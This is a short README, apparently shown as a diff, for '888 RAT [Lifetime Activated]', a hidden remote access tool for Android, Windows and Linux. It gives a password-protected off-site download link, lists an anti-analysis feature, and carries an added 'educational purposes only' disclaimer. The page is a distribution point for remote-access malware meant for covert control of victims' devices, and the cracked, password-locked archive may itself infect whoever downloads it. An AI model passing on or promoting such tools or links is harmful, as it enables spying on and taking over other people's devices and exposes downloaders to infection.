CitarSnosis/888-RAT/README.md

 # 888 RAT [Lifetime Activated]
 An advanced hidden remote access tool with free Avaliable modes: for Android, Windows and Linux.
 Download link (sorry, the archive is too big for GitHub): [click](https://mega.nz/file/Vm9CVapC#eZuS5mLZ8myyYhvQdtXredbnd2XuFSxMfzfJD1thDtY), password: 888

+## ⛔️This tool is for educational purposes only

 ## Features:
 ### ⭐General:
 <br>✅AntiAnalysis